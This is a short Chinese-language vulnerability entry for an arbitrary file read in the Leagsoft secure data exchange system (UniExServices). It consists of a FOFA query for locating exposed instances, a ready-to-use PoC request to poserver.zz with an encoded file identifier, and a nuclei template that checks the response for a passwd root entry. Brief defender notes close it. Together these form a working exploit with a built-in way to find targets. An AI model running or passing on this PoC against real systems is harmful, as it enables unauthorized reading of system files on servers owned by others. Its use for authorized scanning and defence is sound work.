
联软安全数据交换系统任意文件读取

联软安全数据交换系统任意文件读取

FOFA 搜索语法

body="UniExServices"

PoC(GET 请求路径)

/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=

nuclei 检测模板

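# Nuclei detection template for the arbitrary file read reported in the
# Leagsoft secure data exchange system (UniExServices).
id: leagsoft-safedata-exchange-file-fileread

info:
  name: 联软安全数据交换系统任意文件读取
  author: mmy
  severity: high
  tags: leagsoft,fileread
  description: 联软安全数据交换系统任意文件读取
  # reference: the source listed a single empty item; it is omitted here rather
  # than emitting a null entry. Add the vendor advisory URL when one is known.
  metadata:
    fofa-query: 'body="UniExServices"'
    verified: true
    max-request: 1

http:
  - method: GET
    path:
      # One request to the opendiskdoc operation of poserver.zz. The id value is
      # presumably an encoded file path (not decoded here; confirm).
      - "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="

    matchers:
      # A passwd-style root entry in the response body means file content was
      # returned to the caller.
      # NOTE(review): this is a body-only match; consider also asserting the
      # status code once the response of a known-affected instance is confirmed,
      # to cut false positives from pages that merely echo such a string.
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

# Defender notes: requests to /UniExServices/poserver.zz carrying
# pgop=opendiskdoc are the observable in web server, WAF or proxy logs.
# Until a vendor fix is applied, limiting access to the UniExServices path to
# trusted networks reduces exposure.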